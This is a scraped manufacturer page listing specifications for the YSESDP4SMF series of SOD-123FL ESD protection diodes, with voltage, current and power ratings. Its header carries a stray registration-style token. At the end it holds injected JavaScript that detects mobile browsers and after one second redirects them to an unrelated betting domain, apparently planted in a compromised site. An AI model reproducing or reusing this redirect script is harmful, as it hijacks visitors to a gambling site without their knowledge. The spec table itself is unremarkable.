5197注册

  • EN

ESD Protection

Part Number Reverse Stand-off Voltage Reverse Breakdown Voltage Reverse Leakage Current Clamping Voltage Max. Clamping Voltage Peak Pulse Current Off-State Capacitance Peak Pulse Power (8/20uS) ESD Air(kV) ESD Contact(kV) Direction Package download
VRWM(V) VBR(min)(V) IR(uA) VC(V) @ 1A VC(V) @ Ipp Ipp(A) CJ(pF) Ppp(W)
YSESDP4SMF11A 11 12.2 2.5 - 18.2 22 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF12A 12 13.3 2.5 - 19.9 20.1 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF13A 13 14.4 1 - 21.5 18.6 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF14A 14 15.6 1 - 23.2 17.2 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF15A 15 16.7 1 - 24.4 16.4 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF16A 16 17.8 1 - 26 15.4 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF17A 17 18.9 1 - 27.6 14.5 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF18A 18 20 1 - 29.2 13.7 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF20A 20 22.2 1 - 32.4 12.3 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF22A 22 24.4 1 - 35.5 11.3 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF24A 24 26.7 1 - 38.9 10.3 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF26A 26 28.9 1 - 42.1 9.5 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF28A 28 31.1 1 - 45.4 8.8 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF3.3A 3.3 5.2 600 - 8 43.8 - 350 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF30A 30 33.3 1 - 48.4 8.3 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF33A 33 36.7 1 - 53.3 7.5 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF36A 36 40 1 - 58.1 6.9 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF40A 40 44.4 0.1 - 64.5 6.2 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF43A 43 47.8 0.1 - 69.4 5.8 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
YSESDP4SMF45A 45 50 0.1 - 72.7 5.5 - 400 30 30 Uni SOD-123FL YSESDP4SMFxxA_REV.02_20200506.pdf
var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();